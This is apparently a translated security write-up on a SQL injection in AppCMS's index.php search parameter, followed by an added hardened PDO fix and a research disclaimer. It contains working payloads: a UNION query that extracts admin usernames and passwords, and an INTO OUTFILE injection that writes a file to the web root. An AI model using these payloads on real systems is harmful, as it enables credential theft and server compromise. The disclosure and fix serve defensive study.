index.php:
if (trim($_GET['q']) != '' && !isset($_GET['tpl'])) {
    $str = '';
    // the raw request parameter is concatenated into the LIKE pattern without escaping
    $sql = "SELECT app_id,app_title,app_down FROM " . TB_PREFIX . "app_list WHERE app_title LIKE '%" . trim($_GET['q']) . "%' LIMIT 15";
    $app_list = $dbm->query($sql);
    if (count($app_list['list']) > 0) {
        foreach ($app_list['list'] as $k => $v) {
            $app_list['list'][$k]['app_title'] = helper::utf8_substr($v['app_title'], 0, 20);
        }
        echo json_encode($app_list['list']);
        exit;
    } else {
        exit;
    }
}
$_GET['q'] is passed straight into the query.
Construct:
q=1%'union select 1,uname,upass from appcms_admin_list %23
1%' closes the preceding '% so the LIKE clause stays syntactically complete; # comments out the rest of the statement; the UNION query then returns the data.
The SQL statement becomes:
SELECT app_id,app_title,app_down FROM <TB_PREFIX>app_list WHERE app_title LIKE '%1%'union select 1,uname,upass from appcms_admin_list
Writing a shell:
q=1%'union select 1,2,'aaa' into outfile 'D://WWW//a.php' %23
The statement becomes:
SELECT app_id,app_title,app_down FROM <TB_PREFIX>app_list WHERE app_title LIKE '%1%'union select 1,2,'aaa' into outfile 'D://WWW//a.php'
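The root cause in both queries above is the same: the search term is spliced into the LIKE literal, so a single quote ends the string. Below is an added, hardened version of the same search handler (not AppCMS's own code); it assumes a PDO connection in $pdo and the same TB_PREFIX constant, and binds the whole LIKE pattern as one parameter so no part of $q can alter the statement.

```php
<?php
// Added hardened example, not part of the original post or of AppCMS.
// Assumes: $pdo is a connected PDO instance, TB_PREFIX is defined (e.g. 'appcms_').

/** Escape LIKE metacharacters so the user's text is matched literally.
 *  '!' is used as the escape character and declared in the ESCAPE clause. */
function like_literal(string $s): string
{
    return str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $s);
}

function search_apps(PDO $pdo, string $q): array
{
    $q = trim($q);
    if ($q === '') {
        return [];
    }
    // Table name comes from a compile-time constant, never from the request.
    $sql = 'SELECT app_id, app_title, app_down FROM ' . TB_PREFIX . 'app_list'
         . " WHERE app_title LIKE ? ESCAPE '!' LIMIT 15";
    $stmt = $pdo->prepare($sql);
    // The pattern travels as a bound value: a quote inside $q stays data,
    // so neither the UNION nor the INTO OUTFILE tail can reach the parser.
    $stmt->execute(['%' . like_literal($q) . '%']);
    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
    foreach ($rows as &$row) {
        $row['app_title'] = mb_substr($row['app_title'], 0, 20, 'UTF-8');
    }
    unset($row);
    return $rows;
}

if (isset($_GET['q']) && !isset($_GET['tpl'])) {
    $rows = search_apps($pdo, (string) $_GET['q']);
    header('Content-Type: application/json; charset=utf-8');
    echo json_encode($rows, JSON_UNESCAPED_UNICODE);
    exit;
}
```

The INTO OUTFILE write shown above also needs the FILE privilege on the database account, so the application's MySQL user should run without it regardless of the query fix.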
Author: p0
Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability whatsoever. For questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).